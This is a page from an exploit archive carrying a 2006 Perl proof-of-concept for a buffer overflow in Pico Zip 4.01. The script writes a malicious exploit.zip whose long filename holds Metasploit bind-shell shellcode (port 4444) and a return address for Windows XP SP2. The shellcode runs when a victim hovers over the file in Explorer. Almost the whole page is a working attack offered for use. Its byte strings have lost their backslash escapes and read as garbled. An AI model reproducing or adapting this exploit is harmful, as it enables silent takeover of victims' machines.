[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit
# Published : 2006-06-15
# Author : c0rrupt
# Previous Title : MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)
# Next Title : MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)
#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)
$offset = "x6FxE2xD7x5A"; #Windows XP SP2 English
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xa3".
"x52xaax9ax83xebxfcxe2xf4x5fx38x41xd7x4bxabx55x65".
"x5cx32x21xf6x87x76x21xdfx9fxd9xd6x9fxdbx53x45x11".
"xecx4ax21xc5x83x53x41xd3x28x66x21x9bx4dx63x6ax03".
"x0fxd6x6axeexa4x93x60x97xa2x90x41x6ex98x06x8exb2".
"xd6xb7x21xc5x87x53x41xfcx28x5exe1x11xfcx4exabx71".
"xa0x7ex21x13xcfx76xb6xfbx60x63x71xfex28x11x9ax11".
"xe3x5ex21xeaxbfxffx21xdaxabx0cxc2x14xedx5cx46xca".
"x5cx84xccxc9xc5x3ax99xa8xcbx25xd9xa8xfcx06x55x4a".
"xcbx99x47x66x98x02x55x4cxfcxdbx4fxfcx22xbfxa2x98".
"xf6x38xa8x65x73x3ax73x93x56xffxfdx65x75x01xf9xc9".
"xf0x01xe9xc9xe0x01x55x4axc5x3axbbxc6xc5x01x23x7b".
"x36x3ax0ex80xd3x95xfdx65x75x38xbaxcbxf6xadx7axf2".
"x07xffx84x73xf4xadx7cxc9xf6xadx7axf2x46x1bx2cxd3".
"xf4xadx7cxcaxf7x06xffx65x73xc1xc2x7dxdax94xd3xcd".
"x5cx84xffx65x73x34xc0xfexc5x3axc9xf7x2axb7xc0xca".
"xfax7bx66x13x44x38xeex13x41x63x6ax69x09xacxe8xb7".
"x5dx10x86x09x2ex28x92x31x08xf9xc2xe8x5dxe1xbcx65".
"xd6x16x55x4cxf8x05xf8xcbxf2x03xc0x9bxf2x03xffxcb".
"x5cx82xc2x37x7ax57x64xc9x5cx84xc0x65x5cx65x55x4a".
"x28x05x56x19x67x36x55x4cxf1xadx7axf2x53xd8xaexc5".
"xf0xadx7cx65x73x52xaax9a";
$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;
$head = "x50x4Bx03x04x14x00x00x00x00x00".
"xB7xACxCEx34x00x00x00x00x00x00".
"x00x00x00x00x00x00x14x02x00x00";
$middle = "x2ex74x78x74x50x4Bx01x02x14x00".
"x14x00x00x00x00x00xB7xACxCEx34".
"x00x00x00x00x00x00x00x00x00x00".
"x00x00x14x02x00x00x00x00x00x00".
"x01x00x24x00x00x00x00x00x00x00";
$tail = "x2ex74x78x74x50x4Bx05x06x00x00".
"x00x00x01x00x01x00x42x02x00x00".
"x32x02x00x00x00x00";
$evilzip = $head . $filename . $middle . $filename . $tail;
open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);
# www.Syue.com [2006-06-15]